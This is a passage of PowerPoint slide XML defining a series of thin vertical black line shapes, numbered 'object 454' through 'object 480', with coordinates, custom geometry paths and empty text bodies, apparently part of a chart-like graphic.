          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="367664">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="367519"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="object 454"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6966675" y="4963921"/>
            <a:ext cx="0" cy="768851"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="387985">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="387766"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="object 455"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6966403" y="4967149"/>
            <a:ext cx="1258" cy="766334"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="386714">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="386142"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="object 456"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6994581" y="4936560"/>
            <a:ext cx="0" cy="796535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="401955">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="401572"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="object 457"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6994307" y="4937364"/>
            <a:ext cx="2517" cy="795276"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="401319">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="401172"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="object 458"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022435" y="4903302"/>
            <a:ext cx="0" cy="829252"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="418464">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="418361"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="object 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021368" y="4904643"/>
            <a:ext cx="1258" cy="827993"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="417830">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="417684"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="object 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050340" y="4919389"/>
            <a:ext cx="0" cy="814152"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="410844">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="410242"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="object 461"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050067" y="4918005"/>
            <a:ext cx="2517" cy="815410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="411480">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="410941"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="object 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7078246" y="4919936"/>
            <a:ext cx="0" cy="812891"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="410210">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="409966"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="object 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7076042" y="4918253"/>
            <a:ext cx="2517" cy="814152"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="410844">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="410816"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="object 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7105551" y="4916163"/>
            <a:ext cx="0" cy="816668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="412114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="411872"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="object 465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7105279" y="4916409"/>
            <a:ext cx="1258" cy="816668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="412114">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="411747"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="object 466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7133459" y="4907614"/>
            <a:ext cx="0" cy="825475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="416560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="416180"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="object 467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7133186" y="4906734"/>
            <a:ext cx="3775" cy="826735"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="417194">
                <a:moveTo>
                  <a:pt x="687" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="687" y="416629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="object 468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161364" y="4915110"/>
            <a:ext cx="0" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="412750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="412396"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="object 469"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7160545" y="4915915"/>
            <a:ext cx="1258" cy="816668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="412114">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="411996"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="object 470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189217" y="4914026"/>
            <a:ext cx="0" cy="819183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="413385">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="412949"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="object 471"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188943" y="4915367"/>
            <a:ext cx="2517" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="412750">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="412272"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="object 472"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217124" y="4896889"/>
            <a:ext cx="0" cy="835543"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="421639">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="421592"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="object 473"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7215208" y="4896009"/>
            <a:ext cx="2517" cy="836802"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="422275">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="422041"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="object 474"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7244976" y="4904385"/>
            <a:ext cx="0" cy="827993"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="417830">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="417809"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="object 475"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7244704" y="4905190"/>
            <a:ext cx="1258" cy="827993"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="417830">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="417408"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="object 476"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7272335" y="4914573"/>
            <a:ext cx="0" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="412750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="412673"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="object 477"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269594" y="4915613"/>
            <a:ext cx="2517" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="412750">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="412148"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="object 478"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7300241" y="4888845"/>
            <a:ext cx="0" cy="844350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="426085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="425651"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="object 479"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7299669" y="4886624"/>
            <a:ext cx="1258" cy="846869"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="427355">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="426776"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="object 480"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328093" y="4883987"/>
            <a:ext cx="0" cy="849385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="428625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="428108"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
